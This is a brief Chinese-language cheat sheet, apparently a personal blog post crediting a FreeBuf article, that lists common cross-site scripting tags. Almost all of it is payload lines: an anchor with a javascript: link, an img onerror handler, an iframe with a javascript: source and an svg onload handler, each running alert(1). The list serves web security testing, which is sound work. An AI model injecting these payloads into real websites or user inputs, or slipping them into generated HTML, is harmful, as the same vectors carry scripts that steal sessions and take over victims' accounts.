前言:
在网上找标签费时间,而且有时候忘记怎么找了,所以现在写一篇
由以下大佬赞助发布
xss 常用标签及绕过姿势总结 - FreeBuf网络安全行业门户
内容:
<a>标签
<a href="javascript:alert(1)">test</a>
<img>标签
<img src=x onerror="alert(1)">
<iframe>标签
<iframe src="javascript:alert(1)">test</iframe>
<svg> 标签
<svg onload=javascript:alert(1)>
